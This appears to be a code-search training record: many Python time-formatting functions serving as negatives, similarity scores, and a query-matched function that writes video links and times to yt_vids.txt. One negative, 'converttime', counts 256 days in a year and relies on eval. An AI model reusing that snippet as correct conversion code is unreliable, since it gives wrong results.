[ "def format_time(self, time):\n hh = time[0:2]\n mm = time[2:4]\n ss = time[4:]\n return \"%s:%s:%s UTC\" % (hh,mm,ss)", "def time_hack(self):\n now = datetime.datetime.now()\n monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun',\n 'jul', 'aug', 'sep', 'oct', 'nov', 'dec']\n month = monthnames[now.month - 1].capitalize()\n return ('[%02d/%s/%04d:%02d:%02d:%02d.%06d]' %\n (now.day, month, now.year, now.hour, now.minute, now.second, now.microsecond))", "def __format_time(in_time):\n logging.debug(\"in_time = %s\", in_time)\n out = in_time.strftime(\"%a, %d %b %Y %H:%M:%S %z+0000\")\n logging.debug(\"out = %s, out\")\n return out", "def format_time(self, data):\r\n if self.datetime_formatting == 'rfc-2822':\r\n return format_time(data)\r\n\r\n return data.isoformat()", "def friendly_time(time=None):\n if time is None:\n time = pass_good_until()\n return time.strftime(config.TIME_PRINT_FORMAT)", "def time_helper(seperator = '_', to_sec = False):\n localtime = time.asctime(time.localtime(time.time()))\n if to_sec:\n return time.strftime(\"%Y\" + seperator + \"%m\" + seperator + \"%d\" + seperator + \"%H\" + seperator + \"%M\" + seperator + \"%S\", time.localtime()) \n return time.strftime(\"%Y\" + seperator + \"%m\" + seperator + \"%d\" + seperator + \"%H\" + seperator + \"%M\", time.localtime())", "def get_time_str():\n return time.strftime(time_fmt)", "def format_time(t):\r\n # again, workaround dateformat input requirement\r\n dt = aware_datetime(2000, 1, 1, t.hour, t.minute, t.second)\r\n return dateformat.format(dt, 'H:i:s O')", "def format_time(time):\n hour, minute = time.hour, time.minute\n period = \"am\" if hour < 12 or hour == 24 else \"pm\"\n hour = hour % 12\n if hour == 0:\n hour = 12\n return \":t:\" + str(hour) + \":\" + str(minute).rjust(2, \"0\") + period", "def format_time(value):\n if value:\n time = dateutil.parser.parse(value)\n # pylint: disable=E1101\n return time.strftime(\"%I:%M%p\")\n else:\n return ''", "def format_time(self, time):\n hours = time // 3600\n time = time - hours*3600\n minutes = time // 60\n seconds = time - minutes*60\n return ('%d:%d:%d' %(hours, minutes, seconds))", "def format_time(t):\n m, s = divmod(t, 60)\n h, m = divmod(m, 60)\n if h:\n return f\"{h:2.0f}hr {m:2.0f}min {s:4.1f}s\"\n elif m:\n return f\"{m:2.0f}min {s:4.1f}s\"\n else:\n return f\"{s:4.1f}s\"", "def standardTime(time):\n time = localize(time)\n return time.strftime('%m/%d/%Y').lstrip('0') + ' @ ' + time.strftime('%I:%M%p').lstrip('0') if time is not None else ''", "def format(t):\r\n \r\n tenths_of_seconds = t % 10\r\n t /= 10\r\n seconds = t % 60\r\n minutes = t / 60\r\n \r\n # Format String: http://www.codeskulptor.org/docs.html#string-formatting\r\n formatted_time = '%(minutes)0d:%(seconds)02d.%(ts)0d' % \\\r\n {\r\n \"minutes\": minutes, \r\n \"seconds\": seconds, \r\n \"ts\": tenths_of_seconds\r\n }\r\n \r\n return formatted_time", "def formatTime(time):\n\n return datetime.strptime(time, \"%d/%m/%Y %H:%M:%S\").strftime(\"%a, %d/%m/%Y %H:%M:%S\")", "def timeConvert(time):\n\n FMTin = '%Y-%m-%d %H:%M:%S'\n FMTout = '%m/%d/%y'\n\n return datetime.strftime(datetime.strptime(time, FMTin), FMTout)", "def format_time(value: int) -> str:\n return (datetime(1970, 1, 1) + timedelta(milliseconds=value)).strftime('%Y%m%d%H%M%S')", "def format_time(value: float) -> str:\n if value <= 0.01:\n return f\"{value * 1000000:.0f}us\"\n elif value <= 0.1:\n return f\"{value * 1000:.1f}ms\"\n elif value > 172800:\n return f\"{value / 86400:.2f}days\"\n elif value > 86400:\n return f\"{value / 86400:.2f}day\"\n elif value > 1800:\n return f\"{value / 3600:.2f}hr\"\n elif value > 60:\n return f\"{value / 60:.2f}min\"\n return f\"{value:.2f}s\"", "def format_time(t: float):\n if t >= 60:\n return f\"{round(t / 60.0, 2)} mins\"\n else:\n return f\"{round(t, 2)} secs\"", "def _tp_fmt(var):\n if type(var) is datetime:\n if var.hour == 0 and var.minute == 0:\n str_out = var.strftime('%Y-%m-%d')\n else:\n str_out = var.strftime('%Y-%m-%d %H:%M')\n else:\n str_out = var\n return str_out", "def get_time_human_readable():\n return time.strftime(\"%A, %H:%M\")", "def format_time(time_value):\n if time_value is None:\n return \"Never\"\n else:\n result = \"%s UTC\" % (time.asctime(time.gmtime(time_value)))\n # Windows uses a leading 0 on the day of month field, which makes it different behavior from Linux\n # which uses a space in place of the leading 0. For tests, we need this to behave the same, so we spend\n # the small effort here to make it work. At least, that leading 0 is always in the same place.\n if result[8] == \"0\":\n result = \"%s %s\" % (result[:8], result[9:])\n return result", "def format_time(timestamp=None, format=r\"%Y%m%d-%H%M%S\"):\n time_str = time.strftime(format, time.localtime(timestamp if timestamp else time.time()))\n return time_str", "def _hour_to_time(num: int):\n return datetime.datetime.now().replace(hour=num).strftime(\"%-I %p\")", "def to_time_format(timestamp: int, fmt: str = '%Y-%m-%d %H:%M:%S'):\n return datetime.fromtimestamp(int(timestamp) // 1000).strftime(fmt)", "def _time_str(self):\n try:\n if not self._time:\n raise ValueError\n format_ = '%a, %d %b %Y %H:%M:%S'\n return datetime.fromtimestamp(float(self._time)).strftime(format_)\n except ValueError:\n return plastic_date()", "def formatTime(self, record, datefmt=None):\n ct = self.converter(record.created)\n _format = datefmt or self.default_time_format\n\n s = ct.strftime(_format)\n\n return s", "def get_time() -> str:\r\n return time.strftime(TIMEFORMAT)", "def _format_time(seconds):\n hrs = seconds // 3600\n seconds -= 3600 * hrs\n mins = seconds // 60\n seconds -= 60 * mins\n return '%02dh%02dm%02ds' % (hrs, mins, seconds)", "def format_time(time: int) -> str:\n minute = time % 100\n hour = int(time / 100)\n\n if hour >= 12:\n if hour > 12:\n hour = hour -12\n response = f'{hour} {minute} pm'\n else:\n response = f'{hour} {minute} am'\n\n return response", "def formatted_time() -> datetime.datetime:\r\n return datetime.datetime.now()", "def prepareTime(time):\n time = str(time)\n time = '000000'+time\n time = time[len(time)-6:]\n return time", "def on_action_set_time_format(self, content):\n self.set_time_format(content['time_format'])", "def render_time(dt):\n return dt.strftime('%H:%M:%S')", "def custom_strftime(format, t): \n return t.strftime(format).replace(\"{S}\", str(t.day) + suffix(t.day))", "def test_make_time_str(self):\n\n s = custom_date.make_time_str(\"23\", \"15\", \"01\", \"100\")\n self.assertEqual(s, \"23:15:01.100\")", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n timeString = time.strftime(_format, time.localtime()) + \"\\t\"\n return timeString", "def format_time(self, record):\r\n record.created = time.strftime(\"%d.%m.%Y %H:%M:%S\", time.localtime(record.created))", "def break_time(t='now', time_format=''):\n # TODO: should be able to handle a time range\n return parse_time(t, time_format).strftime(\"%Y%m%d_%H%M%S\")", "def format_time(s):\n s = int(s)\n m, s = divmod(s, 60)\n h, m = divmod(m, 60)\n return f'{h:02d}h{m:02d}m{s:02d}s'", "def format(t):\n tenths = t % 10\n seconds = (t // 10) % 60\n minutes = (t // 10) // 60\n if seconds < 10:\n seconds_str = '0' + str(seconds)\n else:\n seconds_str = str(seconds)\n t_string = str(minutes) + ':' + seconds_str + '.' + str(tenths)\n return t_string", "def friendly_time(time=None):\n if time is None:\n time = pass_good_until(config.HOURS_TO_GRANT_ACCESS, 7)\n return time.strftime(config.TIME_PRINT_FORMAT)", "def now_short(_format=\"%Y%m%d-%H%M%S\"):\n return time.strftime(_format, time.localtime()) + \"\\t\"", "def _format_time(record, datefmt=None):\n time_tuple = time.localtime(record.created)\n tz_name = time.tzname[time_tuple.tm_isdst]\n return '%(date_time)s-%(millis)03d-%(tz_name)s' % dict(\n date_time=time.strftime('%Y%m%d-%H%M%S', time_tuple),\n millis=record.msecs,\n tz_name=tz_name,\n )", "def time(value, arg=None):\n if value in (None, ''):\n return ''\n try:\n return formats.time_format(value, arg)\n except (AttributeError, TypeError):\n try:\n return time_format(value, arg)\n except (AttributeError, TypeError):\n return ''", "def _time_to_pretty_string(time_object: time) -> str:\n if time_object.second != 0:\n pretty_format = \"%I:%M:%S %p\"\n elif time_object.minute != 0:\n pretty_format = \"%I:%M %p\"\n elif time_object.minute is not None:\n pretty_format = \"%I %p\"\n pretty_string = time.strftime(time_object, pretty_format)\n\n # We do not want leading zero so 09 AM -> 9 AM\n if pretty_string[0] == '0':\n return pretty_string[1:]\n else:\n return pretty_string", "def nowStr(time=None):\n if time is None:\n time = datetime.now().time()\n if time.minute < 10:\n return time.strftime(\"%H ноль %m\")\n else:\n return time.strftime(\"%H %M\")", "def user_friendly_time(s):\n s = int(s)\n if s < 60:\n return \"{}s\".format(s)\n\n m = s // 60\n s = s % 60\n if m < 60:\n return \"{}m {}s\".format(m, s)\n\n h = m // 60\n m = m % 60\n if h < 24:\n return \"{}h {}m {}s\".format(h, m, s)\n\n d = h // 24\n h = h % 24\n return \"{}d {}h {}m {}s\".format(d, h, m, s)", "def set_time_format(self, time_format):\n # XXX make sure Python's and Qt's format strings are the\n # same, or convert between the two.\n self.widget().setDisplayFormat(time_format)", "def default_time_format(self):\n if self.cluster.cassandra_version() < LooseVersion('3.4'):\n logger.debug('Using legacy time format for version ' + str(self.cluster.cassandra_version()))\n self._default_time_format = '%Y-%m-%d %H:%M:%S%z'\n else:\n logger.debug('Using latest time format for version ' + str(self.cluster.cassandra_version()))\n self._default_time_format = '%Y-%m-%d %H:%M:%S.%f%z'\n\n return self._default_time_format", "def usformat(date):\r\n return date.strftime('%m-%d-%Y %H:%M:%S')", "def time_str(num):\n if num > 3600:\n return \"%0.2f hrs\" % (num / 3600)\n elif num > 60:\n return \"%0.2f mins\" % (num / 60)\n else:\n return \"%d seconds\" % num", "def time2shortstr(time):\n return time.strftime(MEM_SHORT_TIME_FORMAT)", "def printTime(t):\n if t < 2 * MINUTE:\n return \"%d seconds\" % (t / SECOND)\n if t < 5 * HOUR:\n return \"%d minutes\" % (t / MINUTE)\n if t < 3 * DAY:\n return \"%d hours\" % (t / HOUR)\n if t < YEAR:\n return \"%d days\" % (t / DAY)\n if (t % YEAR) == 0:\n return \"%d years\" % (t / YEAR)\n else:\n return \"%5.1f years\" % (t / YEAR)", "def format_time(self, record):\n record.dbtime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(record.created))\n return", "def _external_time_format(int_time):\n simple_iso_time = True\n if simple_iso_time:\n ext_time = int_time.replace(tzinfo=SimpleUtc()).isoformat()\n else:\n ext_time = int_time.isoformat() + \"Z\"\n return ext_time", "def normalise_time(time_str):\n\n hour = time_str.split(\":\")[0]\n if int(hour) >= 24:\n normalised_hour = int(hour) % 24\n return time_str.replace(hour, f\"{normalised_hour:02}\")\n\n return time_str", "def timestamp(style=False):\r\n\r\n if not style:\r\n return time.strftime('%H:%M:%S%p %D', time.localtime())\r\n else:\r\n return time.strftime(style, time.localtime())", "def format_time(self, record):\n record.dbtime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(record.created))", "def transform_time(t):\n if t is None:\n return None\n elif isinstance(t, basestring):\n return t\n\n dt = datetime.fromtimestamp(t, UTC())\n return dt.strftime('%Y-%m-%dT%H:%M:%S%z')", "def formatCurrTime(fmt=\"%H:%M:%S\"):\n assert fmt is not None, \"The format is None\"\n return strftime(fmt)", "def convert_time(slog_time_str):\n \n base_time = datetime.datetime(2007, 1, 1)\n delta = datetime.timedelta(0, float(slog_time_str))\n \n timestamp = base_time + delta\n taml_dtg = timestamp.strftime('%Y-%m-%dT%H:%M:%S')\n return taml_dtg", "def test_format_time():\n number = random.randint(10000, 99999)\n formatted_number = race.format_time(str(number))\n assert type(formatted_number) == str\n assert \":\" in formatted_number and \".\" in formatted_number", "def converttime(time, currentformat, newformat):\n\n # Define conversion dictionary\n conversions = {\n \"milliseconds\": {\n \"milliseconds\": \"time\",\n \"seconds\": \"time / 1000\",\n \"minutes\": \"time / 1000 / 60\",\n \"hours\": \"time / 1000 / 60 / 60\",\n \"days\": \"time / 1000 / 60 / 60 / 24\",\n \"weeks\": \"time / 1000 / 60 / 60 / 24 / 7\",\n \"fortnights\": \"time / 1000 / 60 / 60 / 24 / 14\",\n \"years\": \"time / 1000 / 60 / 60 / 24 / 365\",\n \"decades\": \"time / 1000 / 60 / 60 / 24 / 365 / 10\",\n \"centuries\": \"time / 1000 / 60 / 60 / 24 / 365 / 100\",\n \"millenniums\": \"time / 1000 / 60 / 60 / 24 / 365 / 1000\"\n },\n \"seconds\": {\n \"milliseconds\": \"time * 1000\",\n \"seconds\": \"time\",\n \"minutes\": \"time / 60\",\n \"hours\": \"time / 60 / 60\",\n \"days\": \"time / 60 / 60 / 24\",\n \"weeks\": \"time / 60 / 60 / 24 / 7\",\n \"fortnights\": \"time / 60 / 60 / 24 / 14\",\n \"years\": \"time / 60 / 60 / 24 / 365\",\n \"decades\": \"time / 60 / 60 / 24 / 365 / 10\",\n \"centuries\": \"time / 60 / 60 / 24 / 365 / 100\",\n \"millenniums\": \"time / 60 / 60 / 24 / 365 / 1000\"\n },\n \"minutes\": {\n \"milliseconds\": \"time * 60 * 1000\",\n \"seconds\": \"time * 60\",\n \"minutes\": \"time\",\n \"hours\": \"time / 60\",\n \"days\": \"time / 60 / 24\",\n \"weeks\": \"time / 60 / 24 / 7\",\n \"fortnights\": \"time / 60 / 24 / 14\",\n \"years\": \"time / 60 / 24 / 365\",\n \"decades\": \"time / 60 / 24 / 365 / 10\",\n \"centuries\": \"time / 60 / 24 / 365 / 100\",\n \"millenniums\": \"time / 60 / 24 / 365 / 1000\"\n },\n \"hours\": {\n \"milliseconds\": \"time * 60 * 60 * 1000\",\n \"seconds\": \"time * 60 * 60\",\n \"minutes\": \"time * 60\",\n \"hours\": \"time\",\n \"days\": \"time / 24\",\n \"weeks\": \"time / 24 / 7\",\n \"fortnights\": \"time / 24 / 14\",\n \"years\": \"time / 24 / 365\",\n \"decades\": \"time / 24 / 365 / 10\",\n \"centuries\": \"time / 24 / 365 / 100\",\n \"millenniums\": \"time / 24 / 365 / 1000\"\n },\n \"days\": {\n \"milliseconds\": \"time * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 24 * 60 * 60\",\n \"minutes\": \"time * 24 * 60\",\n \"hours\": \"time * 24\",\n \"days\": \"time\",\n \"weeks\": \"time / 7\",\n \"fortnights\": \"time / 14\",\n \"years\": \"time / 365\",\n \"decades\": \"time / 365 / 10\",\n \"centuries\": \"time / 365 / 100\",\n \"millenniums\": \"time / 365 / 1000\"\n },\n \"weeks\": {\n \"milliseconds\": \"time * 7 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 7 * 24 * 60 * 60\",\n \"minutes\": \"time * 7 * 24 * 60\",\n \"hours\": \"time * 7 * 24\",\n \"days\": \"time * 7\",\n \"weeks\": \"time\",\n \"fortnights\": \"time / 2\",\n \"years\": \"time / 52\",\n \"decades\": \"time / 52 / 10\",\n \"centuries\": \"time / 52 / 100\",\n \"millenniums\": \"time / 52 / 1000\"\n },\n \"fortnights\": {\n \"milliseconds\": \"time * 14 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 14 * 24 * 60 * 60\",\n \"minutes\": \"time * 14 * 24 * 60\",\n \"hours\": \"time * 14 * 24\",\n \"days\": \"time * 14\",\n \"weeks\": \"time * 2\",\n \"fortnights\": \"time\",\n \"years\": \"time / 26\",\n \"decades\": \"time / 26 / 10\",\n \"centuries\": \"time / 26 / 100\",\n \"millenniums\": \"time / 26 / 1000\"\n },\n \"years\": {\n \"milliseconds\": \"time * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 256 * 24 * 60\",\n \"hours\": \"time * 256 * 24\",\n \"days\": \"time * 256\",\n \"weeks\": \"time * 52\",\n \"fortnights\": \"time * 26\",\n \"years\": \"time\",\n \"decades\": \"time / 10\",\n \"centuries\": \"time / 100\",\n \"millenniums\": \"time / 1000\"\n },\n \"decades\": {\n \"milliseconds\": \"time * 10 * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 10 * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 10 * 256 * 24 * 60\",\n \"hours\": \"time * 10 * 256 * 24\",\n \"days\": \"time * 10 * 256\",\n \"weeks\": \"time * 10 * 52\",\n \"fortnights\": \"time * 10 * 26\",\n \"years\": \"time * 10\",\n \"decades\": \"time\",\n \"centuries\": \"time / 10\",\n \"millenniums\": \"time / 100\"\n },\n \"centuries\": {\n \"milliseconds\": \"time * 100 * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 100 * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 100 * 256 * 24 * 60\",\n \"hours\": \"time * 100 * 256 * 24\",\n \"days\": \"time * 100 * 256\",\n \"weeks\": \"time * 100 * 52\",\n \"fortnights\": \"time * 100 * 26\",\n \"years\": \"time * 100\",\n \"decades\": \"time * 10\",\n \"centuries\": \"time\",\n \"millenniums\": \"time / 10\"\n },\n \"millenniums\": {\n \"milliseconds\": \"time * 1000 * 256 * 24 * 60 * 60 * 1000\",\n \"seconds\": \"time * 1000 * 256 * 24 * 60 * 60\",\n \"minutes\": \"time * 1000 * 256 * 24 * 60\",\n \"hours\": \"time * 1000 * 256 * 24\",\n \"days\": \"time * 1000 * 256\",\n \"weeks\": \"time * 1000 * 52\",\n \"fortnights\": \"time * 1000 * 26\",\n \"years\": \"time * 1000\",\n \"decades\": \"time * 100\",\n \"centuries\": \"time * 10\",\n \"millenniums\": \"time\"\n }\n }\n\n # Return evaluated value\n return eval(conversions[currentformat][newformat])", "def get_time_string(time):\r\n mins = time // 60\r\n secs = time % 60\r\n time_string = ''\r\n\r\n if mins < 10:\r\n time_string += ' '\r\n elif mins < 100:\r\n time_string += ' '\r\n\r\n time_string += '%dm ' % mins\r\n\r\n if secs < 10:\r\n time_string += ' '\r\n\r\n time_string += '%ds' % secs\r\n\r\n return time_string", "def change_datetime_format(the_datetime):\n\n year = int(the_datetime[:4])\n month = int(the_datetime[5:7])\n day = int(the_datetime[8:10])\n try:\n hour = int(the_datetime[11:13])\n minutes = int(the_datetime[14:16])\n seconds = int(the_datetime[17:19])\n except ValueError:\n hour = 9\n minutes = 0\n seconds = 0\n the_datetime = datetime(year, month, day, hour, minutes, seconds)\n\n return the_datetime", "def format_date(time=False):\n\n return arrow.get(time).format('DD-MM-YYYY')", "def time_string(time_f: float) -> str:\n m, s = divmod(time_f, 60)\n h, m = divmod(m, 60)\n\n if h < 1:\n if m < 1 and s < 1:\n msec = int(s * 1000)\n return '{:=03d}msec'.format(msec)\n\n if m < 1:\n return '{:=02.0f}sec'.format(s)\n\n return '{:=02.0f}min:{:=02.0f}sec'.format(m, s)\n else:\n return '{:=01.0f}h:{:=02.0f}min:{:=02.0f}sec'.format(h, m, s)", "def formatDate(value):\n return time.strftime('%c',time.localtime(value))", "def timestr():\n return dt.strftime(dt.now(),'%H:%M:%S')", "def format_time(seconds: float) -> str:\n # return str(timedelta(seconds=seconds))[2:10] if seconds != 0.0 else \"00:00.00\"\n if seconds == 0.0:\n return \"00.00\"\n elif seconds < 60.0:\n return str(timedelta(seconds=seconds))[5:10] # SS:DD, d decimal\n else:\n return str(timedelta(seconds=seconds))[2:7] # MM:SS", "def format_time(self, created):\n return time.strftime(\n '%Y-%m-%d %H:%M:%S',\n time.localtime(created)\n )", "def get_time() -> str:\n return strftime(\"%H:%M:%S\")", "def _serialize_time(val):\n return val.isoformat()", "def nersc_format_datetime(timetup=None):\n if timetup is None:\n timetup = time.localtime()\n # YYYY-MM-DD[THH:MM[:SS]]\n return time.strftime('%Y-%m-%dT%H:%M:%S', timetup)", "def format_time(tm, tz):\n\tif not tz:\n\t\t# Without a timezone, all we can do is say \"in X seconds\"\n\t\ttm -= int(time.time())\n\t\tif tm < 60: return \"in %d seconds\" % tm\n\t\treturn \"in %d:%02d\" % (tm // 60, tm % 60)\n\ttm = datetime.datetime.fromtimestamp(tm, tz=pytz.timezone(tz))\n\treturn tm.strftime(\"at %H:%M\")", "def format_date(date, time_format=\"23:59:59Z\"):\n date_format = \"%Y-%m-%dT{time}\".format(time=time_format)\n return date.strftime(date_format)", "def time_form(gdf):\n gdf['time'] = gdf['time'].dt.strftime(\"%Y-%m-%dT%H:%M:%S\")\n \n return gdf", "def get_time_string(self):\n return f\"{self.year} {self.month:02} \" \\\n f\"{self.start_day:02} {self.start_hour:02} 00 {self.get_duration():6}\"", "def convertTime(self, sec):\n\n if self.timeFormat == S:\n return '%.3f' % sec\n\n if self.timeFormat == HHMMSS:\n return seconds2time(sec)", "def format_book_time(dt):\n return datetime.strftime(dt, \"%Y-%m-%dT%H:%M:%S%z\")", "def task11_time_converter(num):\n if num < 0:\n raise ValueError\n hour = num // 60\n minute = num % 60\n return f'{hour}:{minute}'", "def unixTimeToString_NEW(ut):\n intTime = int(ut)\n frac = ut - intTime\n #print \"\\nfrac is %f, conv is %f\" % (frac, round(frac*1000))\n y, m, d, ho, mi, se, junk1, junk2, junk3 = gmtime(intTime)\n #print \"ut is %f, s is %4d_%02d_%02d_%02d_%02d_%02d.%03d\\n\" % (ut, y, m, d, ho, mi, se, int(frac*1000))\n #return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, int(frac*1000))\n return '%4d_%02d_%02d_%02d_%02d_%02d.%03d' % (y, m, d, ho, mi, se, round(frac*1000))", "def timestamp(formatting=\"%Y%m%d_%H%M%S\"):\n now = datetime.now()\n return now.strftime(formatting)", "def convert_time(min, sec):\n # Updated 11/19/16 \n total_time = min*60\n total_time = total_time + sec\n \n return str(total_time)+'.0' # string because being passed to GUI", "def timeConversion(s):\n new_s = ''\n if s[-2:] == 'PM' and s[:2] != '12':\n new_s = str(int(s[:2]) + 12) + s[2:-2]\n elif s[-2:] == 'AM' and s[:2] == '12':\n new_s = '0' + str(int(s[:2]) - 12) + s[2:-2]\n else:\n new_s = s[:-2]\n return new_s", "def format_timestamp(value, format='matchtime'):\n if format == 'matchtime':\n # yyyy mm dd hh mm ss\n value = value.split('.')\n return \"{} {} {}:{}\".format(calendar.month_name[int(value[1])], int(value[2]), int(value[3]), value[4])\n elif format == 'shortmatchtime':\n value = value.split('.')\n return \"{}/{} {}:{}\".format(int(value[1]), int(value[2]), int(value[3]), value[4])\n elif format == 'hhmm': # datetime hour/min\n value = value.split('.')\n return \"{}:{}\".format(value[4], value[5])", "def get_formatted_time() -> datetime.strftime:\n\t\n\tnow = datetime.now() # time now\n\thalf_hour = (now - timedelta(minutes = 30)) # time 30 min ago\n\t# returns half hour ago to accommodate for failed checks\n\t# (bc twint behaves as if none found if check failed)\n\tcurrent_time = half_hour.strftime(\"%Y-%m-%d %H:%M:%S\")\n\treturn current_time", "def _ToBlogTime(self, time_tuple):\r\n return time.strftime('%Y-%m-%dT%H:%M:%SZ', time_tuple)", "def test_format_date_time(self):\r\n formatted_date = date_formatter.format_date_time(\"190501:0902\")\r\n self.assertEqual(formatted_date, \"2019-05-01 09:02\")", "def format_datetime(date_time):\n return date_time.strftime(\"%Y-%m-%d %H:%M:%S\")", "def conv_time(stamp):\n value = datetime.fromtimestamp(stamp)\n return value.strftime('%Y-%m-%d %H:%M:%S')", "def format(time_in_seconds):\n \"\"\" in tenths of seconds into formatted string A:BC.D \"\"\"\n # A ten of minutes \n A = time_in_seconds // 600\n Intermediate_Operation = time_in_seconds // 10\n amount_of_seconds = Intermediate_Operation %60\n # B Unity of minutes\n B = amount_of_seconds // 10\n # C ten of seconds\n C = amount_of_seconds % 10\n # D unity of seconds\n D = time_in_seconds % 10\n return str(A)+\":\"+str(B)+str(C)+\".\"+str(D)", "def timestamp2str(t, fmt='%Y-%m-%d %H:%M:%S.000'):\n return datetime.fromtimestamp(t).strftime(fmt)", "def timestamp2str(t, fmt='%Y-%m-%d %H:%M:%S.000'):\n return datetime.fromtimestamp(t).strftime(fmt)", "def adjust_date_format(date, format_in, format_out):\n return datetime.strptime(date, format_in).strftime(format_out)", "def get_time():\n return time.strftime(\"%Y%m%d-%H%M%S\")", "def time():\n return datetime.datetime.now().strftime(\"%Y%m%dT%H%M%SZ\")", "def get_time():\r\n return datetime.datetime.now().strftime(\"%H\")+\":\"+datetime.datetime.now().strftime(\"%M\")+\":\"+datetime.datetime.now().strftime(\"%S\")", "def format_datetime(dt):\r\n return dateformat.format(make_naive(dt), 'r')", "def time_to_string(value):\n if value == gst.CLOCK_TIME_NONE:\n return \"--:--:--.---\"\n ms = value / gst.MSECOND\n sec = ms / 1000\n ms = ms % 1000\n mins = sec / 60\n sec = sec % 60\n hours = mins / 60\n mins = mins % 60\n return \"%02d:%02d:%02d.%03d\" % (hours, mins, sec, ms)" ]
[ "0.7315664", "0.72966367", "0.7183788", "0.7177541", "0.71764636", "0.7169046", "0.7167851", "0.7160244", "0.7139336", "0.7091297", "0.7036572", "0.70216924", "0.6875871", "0.6864549", "0.6824766", "0.6812519", "0.68091184", "0.680905", "0.68039894", "0.67950267", "0.6790418", "0.676419", "0.67641133", "0.6755373", "0.67547417", "0.6725895", "0.6721467", "0.67204535", "0.671611", "0.6695589", "0.6690256", "0.6679656", "0.6677038", "0.6674396", "0.6639681", "0.6625929", "0.6622003", "0.6603827", "0.65885127", "0.65857303", "0.65749174", "0.65630966", "0.65569395", "0.65499437", "0.65350187", "0.6534129", "0.6530745", "0.6530556", "0.6521405", "0.65118337", "0.65050876", "0.64973265", "0.64448005", "0.64362466", "0.641882", "0.6412176", "0.64079565", "0.640563", "0.6392265", "0.6387613", "0.6383741", "0.6375347", "0.6373687", "0.63716733", "0.63621426", "0.63577104", "0.6353923", "0.63529843", "0.63371915", "0.63244784", "0.6314492", "0.63117874", "0.63081634", "0.63062733", "0.6300332", "0.62819505", "0.62784725", "0.6274055", "0.6252027", "0.6245025", "0.6242962", "0.6240084", "0.62338376", "0.62120914", "0.620768", "0.62039536", "0.61831194", "0.6154696", "0.61521727", "0.615051", "0.6144817", "0.6139167", "0.612504", "0.61184657", "0.61184657", "0.6113881", "0.61094934", "0.61025923", "0.6101506", "0.6099635", "0.60984576" ]
0.0
-1
Function that saves the return_list from make_time to a file called yt_vids.txt Optional, default False
def save_link_time(return_list, path_to_download): # Opens a new file and writes lines to it and saves it at the spot provided with open(os.path.join(path_to_download, "yt_vids.txt"), "w") as w: w.write('\n'.join('{} {} {}'.format( x[0], x[1][0], x[1][1]) for x in return_list))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_save_list_to_file(self):\n task_list = TaskList()\n task1 = Task()\n output_file_path = self.testing_files[0]\n task1.set_name('Test Task One')\n task1.set_minutes(30)\n task1.set_notes('This is a great test task')\n task_list.add_task(task1)\n\n self.assert_equal(True, task_list.save_to_file(output_file_path))\n self.assert_equal(True, os.path.isfile(output_file_path))", "def save_file():\n generic = pull_list()\n result = list()\n i = 0\n while True:\n try:\n if generic[i].startswith('CVE'):\n cve_pattern = \"^CVE-\\d+-\\d+|^CVE-\\d+-[X]+\"\n header = re.findall(cve_pattern, generic[i])[0]\n i += 1\n notes = list()\n while not generic[i].startswith('CVE'):\n commit_pattern = \"http[s]?:\\/\\/.+commit\\/[\\S]+\"\n if re.search(commit_pattern, generic[i]):\n link = re.findall(commit_pattern, generic[i])\n notes.append(link[0])\n i += 1\n if notes != list():\n result.append(Data(header, notes))\n except IndexError:\n print('Finished')\n break\n return result", "def output_to_file(utilist, filepath=\"demo.csv\"):\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n with open(filepath, \"a\") as f:\n f.write(utilist + \"\\n\")", "def outList(self,list=False):\n txt = ''\n txt += 'echo \">>> list of expected files on output sandbox\"\\n'\n listOutFiles = []\n stdout = 'CMSSW_$NJob.stdout'\n stderr = 'CMSSW_$NJob.stderr'\n if len(self.output_file) <= 0:\n msg =\"WARNING: no output files name have been defined!!\\n\"\n msg+=\"\\tno output files will be reported back/staged\\n\"\n common.logger.info(msg)\n\n if (self.return_data == 1):\n for file in (self.output_file):\n listOutFiles.append(numberFile(file, '$OutUniqueID'))\n for file in (self.output_file_sandbox):\n listOutFiles.append(numberFile(file, '$NJob'))\n listOutFiles.append(stdout)\n listOutFiles.append(stderr)\n listOutFiles.append('Watchdog_$NJob.log.gz')\n\n txt += 'echo \"output files: '+string.join(listOutFiles,' ')+'\"\\n'\n txt += 'filesToCheck=\"'+string.join(listOutFiles,' ')+'\"\\n'\n txt += 'export filesToCheck\\n'\n taskinfo={}\n taskinfo['outfileBasename'] = self.output_file\n common._db.updateTask_(taskinfo)\n\n if list : return self.output_file\n return txt", "def export_time(z, name, save):\r\n list_dicts = []\r\n csv_columns = [\"initial size\", \"embed algo\", \"regression\", \"time\"]\r\n csv_file = os.path.join(\"..\", save, \"{} times_1.csv\".format(name))\r\n keys = list(z.keys())\r\n for key in keys:\r\n if \" + \" in key:\r\n se = z[key]\r\n initial_method = se.initial_method\r\n method = se.embedding_method\r\n for j in range(len(se.list_dicts_embedding)):\r\n data_results = {\"initial size\": se.initial_size[j], \"embed algo\": initial_method, \"regression\": method,\r\n \"time\": se.times[j]}\r\n list_dicts.append(data_results)\r\n else:\r\n data_results = {\"initial size\": \"\", \"embed algo\": key, \"regression\": \"\", \"time\": z[key][2]}\r\n list_dicts.append(data_results)\r\n with open(csv_file, 'w') as csvfile:\r\n writer = csv.DictWriter(csvfile, fieldnames=csv_columns)\r\n writer.writeheader()\r\n for data in list_dicts:\r\n writer.writerow(data)", "def write_list_file(output_file, clip_list_arr):\n list_file = output_file+'_clip_list.txt'\n print \"list_file: \", list_file\n f = open(list_file, 'w')\n for clip in clip_list_arr:\n line = 'file '+clip\n f.write(\"%s\\n\" % line)\n # Add in a divider movie between clips? (it could go here)\n f.close()\n # 